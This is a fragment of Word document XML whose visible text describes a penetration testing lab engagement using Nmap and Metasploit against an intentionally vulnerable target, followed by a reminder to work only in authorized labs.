    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1F2937" w:sz="12"/>
        </w:pBdr>
        <w:shd w:fill="F3F4F6" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">"Designed and executed a full penetration testing engagement in an isolated virtual lab, using Nmap and Metasploit Framework to identify, exploit, and document critical vulnerabilities on an intentionally vulnerable Linux target, culminating in a professional CVSS-rated vulnerability report."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6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End of document. Remember: always operate within an isolated, authorized lab. Never target systems without explicit written permission.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2026-07-07T06:43:50.475Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-07T06:43:50.475Z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